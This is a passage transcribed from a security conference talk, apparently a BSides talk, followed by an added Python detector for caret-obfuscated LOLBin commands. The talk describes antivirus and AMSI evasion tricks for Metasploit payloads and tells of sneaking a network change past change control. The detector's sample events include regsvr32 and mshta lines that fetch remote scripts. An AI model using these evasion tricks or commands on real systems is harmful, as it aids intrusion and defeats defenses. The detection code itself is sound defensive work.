you'll read the code at that, boy, oh, you know what to do with ten carets, that's some G stuff right there. Build your own bait detection for sure, right? A good example of this is I wrote a tool in 2011, no, it started 2013, and it was a simple command and control infrastructure that uses HTTP and the Advanced Encryption Standard to communicate over, and was a byte-compiled Python program, okay? And it was downloaded over a million times, the TrustedSec one. What it would do is it would launch a shell over HTTP or HTTPS over AES and allow you to communicate back and forth. I uploaded it to VirusTotal to kind of take a look at how it'd get

detected, because, you know, unsigned binary, malicious, it's all hack, been downloaded a million times in the wild, and three out of the 67 or so actually detected it as malicious, which I thought was pretty amazing. So again, you don't have to customize anything, just use what was already available out there and kind of obscure. Let's do a demonstration real quick. Now I'm gonna show you a video and I'm gonna do it live. So here's an example of... let me get the play button if I can find my mouse again. I'm supposed to have sound on that, hang on.

There we go. Okay, so we're gonna run Unicorn, and what I'm gonna do is I'm using something out of the box, Meterpreter, Metasploit, okay? And Metasploit is very commoditized, you see a lot of folks use it, so, you know, if you just take it out of the box it'll get detected by antivirus or something else. We're gonna have a callback to 172 16 2 2 1 at 171 up 43. We're gonna go ahead and just decode it really quick. You'll see the code here in a second. I'm just gonna decode the values here really fast and I'm gonna get the raw code that's gonna be executing on the system and what's gonna be seen by AMSI, the Anti-Malware Scan

Interface. Run it. Here's the code, it's obfuscated, and of course now we're gonna go and paste this over to the PowerShell interpreter over here on the right-hand side. We're also gonna start a listener for Metasploit as well at the same time, so that we have something to catch our shell in the event that we're successful. So over here you can see we have our PowerShell interpreter and we're gonna run msfconsole, and over here, gonna hit play. Oh no, it's kind of blurry, buddy, but we got stopped by AMSI. The Anti-Malware Scan Interface blocked us and it's a virus. What we're gonna do here, really quick, is we're gonna take a look

and say, whoa, I wonder what part of the code is actually getting detected by antivirus, okay? Let's go and run that. So I just cut that out and I hit play. Well, okay, it doesn't get picked up, and apparently the last line of my code is getting picked up by antivirus. So man, must be a really good detection, I'm sure. What if I create a variable? Let's copy that line and paste it. It can't be that easy. Yep, it is. So funny story, Bob does you get your shot, anything else is great, right? Funny story about this one specifically is that Unicorn went for years undetected, years and years and years, and as it started to get more

popular they started writing antivirus signatures for it, okay, and it became a battle between Microsoft and myself. I'm sure I have horrible, horrible names being called on me over there. There are great folks over there, by the way, I love everything they're doing, and they're getting better. But one of the funny parts was that they started writing signatures for Defender every single week, so I got upset, and one week I decided, I'm like, you know what, I'm gonna spend a week and write a program that does all this for me automatically. And so what it would do is it would go and check out the latest Defender signatures, it would check to see if it got hit by

antivirus. If it got hit by antivirus, it automatically rewrote the code for me. I wrote a PowerShell interpreter for Python in it, it would rewrite it for me, it had integrated GitLab checks, so we'd build and pass, make sure I got a shell back and everything. I automated my whole framework and it'll automatically do a pull request for me to see whether or not it got past it. So within about 30 seconds of a new signature being released I already had a bypass already up on GitHub. I'm gonna need it. So that went on for like two months and they finally gave up. This is pretty good. I feel bad for the folks out

writing that, by the way, I mean that has to suck. So here's a version, I'll show you a funny thing here, some quirks. Sometimes it works, sometimes it doesn't, but let me show you an example here. You got me running the latest and greatest, I got a listener up here right now, I'm sure my IP didn't change over the course of talking here, which has happened before. Go ahead, play. We're gonna run our code out of Unicorn. Notice here I got a virus threat protection found, right, got busted, whatever. If I hit play again, it works. No idea. Just to prove that I'm not crazy here, we're on that box. So just run your code twice and you're

fine. I don't understand what's going on here anymore. You could also circumvent this by, if you do something like, a couple examples: so I run this code here, this is the decoded code, you just take this blob here, which is all your shellcode, and just replace it with, instead of using like symbols, you just replace it with numeric values, like five five five five five. It also circumvents all the detection right here, up there as well. Again, really hard stuff, okay, to do, makes me lose sleep at night. Oh, another funny quirk about that: I was testing Unicorn one time and I'd run a command and then run another command and then it was for

some reason it'd be like, this is being blocked by antivirus. One would work, well, my second one, my third one, fourth one wouldn't work, and then I realized there was a bug in Defender where if you submitted something in PowerShell from the command line, for some reason their logic layer started marking every single command as malicious. So if you did like a equals one, it'd be like, you're being blocked by antivirus. a equals two, blocked by antivirus. You have to restart your computer to get rid of that. That's a big bug that they actually ended up fixing, which is good. So that's kind of all over the place, I'm not sure exactly what's going on over there.

Oh, still in the... there we go. So number five: leadership. People, leadership and communication is extremely important. Where I see most programs fail is not having the right leadership in place, and what I mean by that is, when I was the chief security officer for Diebold for a number of years, and when I got to Diebold... there's actually a great talk over at DerbyCon this year that I gave, and my CIO came, and two of the folks that I worked with on the security team came, and we all talked about how we were successful at our company. And what was interesting is that the CIO and me were best friends, and we worked

together to do what was right for that company, no matter what it was, and whether it was, hey, you're being too crazy on security, we'll duke it out and figure it out in the parking lot. You know, we're just friends trying to figure things out in the right way of doing things, and we got more accomplished in three years than I've seen any other program moving in five or ten. And a lot of that had to do with when I first became the chief security officer over at Diebold. What did I do? Did I buy technology? No. Did I go and hire a whole bunch of people? No. I bought a whole bunch of beer and pizza

for the IT folks, like a whole bunch of times, and because I became friends with them, like, hey, I have your back, you have mine. One of the funny stories that I had with Diebold is that at the time we were looking at implementing ScanSafe, which got acquired by Cisco, and ScanSafe was a phenomenal product. The way that they did it at the time is they had these things called beacon servers, and you could basically proxy chain your beacon servers so that you didn't go out 80/443 across your environment anymore, okay? So my goal was to disallow all egress ports, period, and only allow 80/443 for

specific exceptions and 21 for specific exceptions across our entire global enterprise, okay? It's pretty awesome, right? No egress ports whatsoever, and 80/443 completely gone across the entire network. You can't egress out 80/443 unless you go out through the proxy and then hit ScanSafe, which is SSL termination and everything else we had good visibility into. And so I had this project where it should take a normal company probably, what, a year to implement something like that, right, across your globe, maybe six months. Did it in three weeks, and the way that I did it is, I tried to find a... we were a big ITIL shop, okay, and I found a change

control request that had to do something with like tweaking the ScanSafe server, and I'm like, hey Mark, and Mark's in networking, he's like... I'm like, hey man, can you just make this one rule? I think I got everything done, but can you make this one rule: we are blocking 80/443 across the entire company. And he's like, man, I think that's a good idea, you're gonna break some stuff. I'm like, it's okay, there's this change control thing here that, you know, is kind of like that, it kind of sounds like it, so we can just tuck it underneath there and see if it works. And he's like, nah man, I'm not

gonna do it. So I went to... there's a guy next to him, Scott, like, hey man, can you get 80/443 across the network? And he's like, you say? I think it's a good idea. And I'm like, listen, you're gonna get in trouble, I'll take all the blame for it, okay. And so we ended up doing this sweeping change across our entire company within three weeks and broke our entire production instances of where they produced ATMs, because they used code signing to sign the actual boards for each ATM, and stopped production of all our manufacturing facilities. For both of those, like, I was like, whoa, it wasn't

a big deal, but good enough. We didn't get in any trouble whatsoever because it was a specific change we were trying to accomplish across our entire environment. And so, you know, funny stories like that, story after story. We had a customer application where I accidentally found a blind SQL injection, and I overrode everybody's password to the same one on accident and completely crashed the application. Yeah, so you learn. You're right, Oz, and I was younger, younger Dave, younger Dave. But the piece I wanted to hit with this, and then the leadership piece, was like the folks that I worked with knew that I had their back no matter what. If they

messed up or if I messed up, we had each other's backs no matter what. I would go to bat for them, I would make sure that they had the right resources to be able to accomplish what they needed to do. Leadership is really, really important. People is really, really important, to have people to go and do things to help you out. Communication is really, really important. I didn't just go and do things and just, like, hey, I'm gonna shut this down and that's that. I worked with people and communicated those specific things, why we're doing things, to an organization. One thing I'll say is that if you can't make a change in a company, move on. Time and time

again I go to a person or organization, like, man, we really want you to come in because I want you to smash our entire company, because our IT folks just won't do anything we're doing, and I'm the only person in security and they don't want to do anything. We have 100,000 people and there's one person that's the key to the security, you know? This is, you know, my struggle every single day, I'm just fighting fires every day and I can't do it anymore. If you can't make a change in a company that you're working with, it's time to move on. Move to a place that will make a change, move to a company that wants to change in the way

to get better for information security, and I'm a huge advocate of that. If you're at a place where you're no longer feeling effective, or you've already done your job, you've already left your legacy onto that organization, go somewhere else and do it again. It's awesome, it's exciting, it's fun, it's exhilarating, you do new things, you get to figure things out in a different way. All those things become really, really important. So in closing, the five things, right? I talked about what I talked about. I remember sharing and collaboration, right, leadership and communication, behavior, right, what was the other one? I forget the other one. The basics, there we go, the

basics, that I was looking for, the basics. All of those things make up what we are today in security, and it's really easy to get sucked into, hey, I need to start going off these living off the land binaries and scripts and blocking all this stuff when we still have half or one out there. Focusing on the basics becomes really, really important in your environment. Collaborating with people becomes really, really important. What are you doing? I thought I was getting a Smirnoff Ice here for a second. So I say, you know, what's really awesome is events like this. Like, BSides is amazing. When he's like, hey, can you come out here and speak at BSides, I make sure, what's

the date, let me make sure it works, hop on a plane, come on here in two seconds. You know, it's amazing that we have a community of people that want to share their experiences, that want to work together to collectively make the world a better place, and that's exactly what we're doing. So, you know, we're working together, figuring things out, we're making things better. And I could say, again, I've been in this industry for a long time, it's like 18 years, which is really friggin' weird that I have been in this industry for 18 years, 19 years, 2000-2001 got into the security space, 19 years, almost 20 years, which is horrible. I mean, I'm not getting old, you know, 20

years in one individual industry, and I can say over the span of 20 years we've gotten so much better as an industry. Working, in case you need to do that again, and to your point earlier in your presentation, you know, paving the way for our next generation of kids, getting out of the way and stop being that person that's like, hey, you need to, you know, build your own Cat5 cables in order to get a job here. You know, things changed quite a bit in 20 years. It's no longer the MUDding days anymore, it's no longer, you know, modems and BBSes, you know, we're doing things in a different way than we had before, and it's better.

It's not... it's just better. I love all these showstoppers: when the cloud came, like we were gonna stop in the first place, really? Or even waterfall, like we're not gonna eventually go to agile to get stuff out faster? Like, hey, what you're saying is that I can get all my stuff out way faster and I don't have to hire any more resources? Yeah, but it's gonna be a whole bunch of bugs in it. But hang on, you said I can get it out faster and get something across? Yeah, but it's gonna be security holes. No, what you said is it's gonna be out faster. Like, that was gonna stop a business, right? Or the cloud, hey, we

don't have to hire all the IT folks, which, by the way, best thing ever, right? Hey, you get to move to the cloud, you don't have to worry about IT folks, you don't have to worry about, you know, scalability of everything. Is that true? No. Et cetera. In fact, I would say of the past nine engagements that I've done going after a cloud environment, I've broken into every single one of those nine cloud environments based on configuration issues. So again, it doesn't mean necessarily better. Anyways, we're all working together, coming together to get better at what we're doing, and so let's continue to make the world a safer place in security. I think we're all doing that right now. Share your experiences, figure out what

makes you unique and share those experiences, get on stage and start talking about this. So that's what makes us an amazing collaborative industry, and it's just going to continue to grow as it is. And I just want to give a special shout out to Jack Daniel over there for all the stuff he does for BSides. Let's give a round of applause.

That is an incredible man right there, one that I've gotten to know over the many years, and Jack probably didn't even know the story about when I first got introduced to Jack Daniel. It goes back to ShmooCon 2 or 3. Jack was out ranting and raving about something cybersecurity at the, uh, Paul's Security Weekly podcast in the outside area there, and I was like, man, this guy's really, really smart, and I just sat down and listened to him, and since then I've been a follower of Jack for... we've gone through, what do we got now, I don't even know, it's been lots, I guess, that we're getting old, so, you know, 15 years or whatnot. So, you know,

it's an incredible person over there. So again, thanks again, Jack, for all you do. So thank you all very much for coming out to my talk. I hope you learned something new. You know, remember, three carets completely bypass anything else out there, you're all set. But thank you all very much, BSides, appreciate it. [Applause]
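The regsvr32 demo above makes a detection-engineering point rather than an offensive one: a string signature on `/i` fails as soon as cmd.exe caret escapes are sprinkled into the command line, because cmd.exe strips unquoted carets before the binary ever sees its arguments. What follows is an added example for this transcript page, not code from the talk and not a TrustedSec or Binary Defense tool. It normalizes a logged command line the way cmd.exe would (drop unquoted `^`, collapse whitespace) and only then applies behaviour rules for the three signed binaries named in the talk (regsvr32 with `/i` and a URL, certutil or mshta handed an http(s) URL), and it raises a separate finding for the caret obfuscation itself. Assumptions: process-creation telemetry with the full command line is available (Sysmon or an EDR feed), the `example.invalid` host, the user names, the rule names and the sample events are all constructed for the demonstration.

```python
"""Command-line detection that survives the cmd.exe caret trick from the demo.

Added example for this transcript page; not Dave Kennedy's code and not a
TrustedSec or Binary Defense tool.  Assumes process-creation telemetry that
records the full command line (Sysmon or an EDR feed).  Sample events,
host names, user names and rule names are constructed for the demonstration.
"""
import re
from typing import List, Tuple

# Signed Microsoft binaries named in the talk that can fetch and run remote content.
LOLBINS = ("regsvr32", "certutil", "mshta")

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Binary name at the start of the line or right after a path separator, space or quote.
BINARY_RE = re.compile(
    r'(?:^|[\\/\s"])(' + "|".join(LOLBINS) + r")(?:\.exe)?\b", re.IGNORECASE
)


def normalize_cmdline(raw: str) -> str:
    """Return the command line as cmd.exe hands it to the child process.

    Outside double quotes cmd.exe treats '^' as an escape character: the
    caret is dropped and the following character is kept literally.  Inside
    double quotes the caret is an ordinary character.  A caret at the very
    end of the line is simply dropped.  Whitespace runs are collapsed so
    that padding does not matter either.
    """
    out = []
    in_quotes = False
    i = 0
    while i < len(raw):
        ch = raw[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(raw):
                out.append(raw[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip()


def caret_obfuscated(raw: str) -> bool:
    """True when unquoted carets changed the command line.

    A caret in the middle of a binary name or switch has no legitimate
    purpose, so this is reported as its own finding regardless of which
    binary was launched: the behaviour, not the signature, is the tell.
    """
    return "^" in raw and normalize_cmdline(raw) != re.sub(r"\s+", " ", raw).strip()


def analyze(raw: str) -> List[str]:
    """Return the names of the detections that fire for one raw command line."""
    findings: List[str] = []
    if caret_obfuscated(raw):
        findings.append("cmd_caret_obfuscation")
    cmd = normalize_cmdline(raw)
    match = BINARY_RE.search(cmd)
    if not match:
        return findings
    binary = match.group(1).lower()
    has_url = URL_RE.search(cmd) is not None
    if binary == "regsvr32":
        # The demo case: /i pointed at a URL.  /i with a local path (installer use) is left alone.
        if has_url and re.search(r"(?:^|\s)/i\b", cmd, re.IGNORECASE):
            findings.append("regsvr32_remote_scriptlet")
    elif has_url:
        # certutil and mshta fetching from http(s) is the behaviour the talk asks you to look for.
        findings.append(f"{binary}_remote_fetch")
    return findings


# Constructed process-creation events as (user, command line).  Not real telemetry.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("svc_install", r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'),
    ("mary.sales", r"reg^svr32 ^/s ^/i:https://example.invalid/readme.txt"),
    ("mary.sales", r"certutil -ping https://example.invalid/update.txt"),
    ("mary.sales", r'"C:\Windows\System32\mshta.exe" https://example.invalid/page.hta'),
    ("it.admin", r'cmd /c echo "keep^this" > C:\temp\note.txt'),
]


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run analyze() over events and keep only those with at least one finding."""
    results = []
    for user, cmd in events:
        hits = analyze(cmd)
        if hits:
            results.append((user, hits))
    return results


if __name__ == "__main__":
    for user, hits in scan(SAMPLE_EVENTS):
        print(f"{user}: {', '.join(hits)}")
```

The benign installer run and the quoted caret in the `echo` line produce nothing, while the three events from the sales workstation each fire; the caret-obfuscated regsvr32 line fires twice, once for the obfuscation and once for the remote `/i`. Baselining by user, as the talk suggests for "Mary in sales", is the natural next layer on top of these rules.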